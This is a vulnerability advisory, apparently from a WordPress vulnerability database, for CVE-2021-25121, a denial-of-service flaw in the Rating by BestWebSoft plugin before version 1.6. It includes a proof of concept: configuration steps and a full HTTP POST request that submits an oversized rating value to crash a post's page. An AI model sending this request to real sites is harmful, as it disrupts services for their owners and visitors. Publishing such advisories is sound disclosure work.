WordPress Plugin Vulnerabilities

Rating by BestWebSoft < 1.6 - Rating Denial of Service

Description

The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service on the post/page when a user submit such rating

Proof of Concept

Under Settings -> Discussion, uncheck "Comment must be manually approved"
Install and Enable Rating BestWebSoft plugin Change "Enable Rating for" to "All" (Works for others, but this allows guest to post) Change "My Rating Position" to "In comments"
Submit a valid comment and capture with Burp or another application. Change the post parameter "rtng_rating[0]" to a large integer such as 1000000000

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Connection: close
Cookie: [depends on plugin's settings]
Upgrade-Insecure-Requests: 1

rtng_show_title=1&rtng_rating%5B0%5D=1000000000&comment=aa&author=Yolo&email=krkgh%40jgoirtjg.com&url=&submit=Post+Comment&comment_post_ID=5887&comment_parent=0

Affects Plugins

Plugin icon
rating-bws
Fixed in 1.6

References

CVE
CVE-2021-25121

Miscellaneous

Original Researcher
Drew Jones
Submitter
Drew Jones
Submitter twitter
qhum7sec
Verified
Yes
WPVDB ID
efb1ddef-2123-416c-a932-856d41ed836d

Timeline

Publicly Published
2022-05-24 (about 1 years ago)
Added
2022-05-24 (about 1 years ago)
Last Updated
2023-02-20 (about 1 years ago)

Other

Published
Title
Published
2024-01-12
Title
Quiz Maker < 6.5.0.6 - Denial of Service
Published
2015-07-02
Title
Simple Ads Manager < 2.9.4.116 - Unauthenticated Denial of Service (DoS)
Published
2024-02-08
Title
Backuply - Backup, Restore, Migrate and Clone < 1.2.6 - Unauthenticated Denial of Service
Published
2023-10-12
Title
WP < 6.3.2 - Denial of Service via Cache Poisoning
Published
2014-11-20
Title
WordPress <= 4.0 - Long Password Denial of Service (DoS)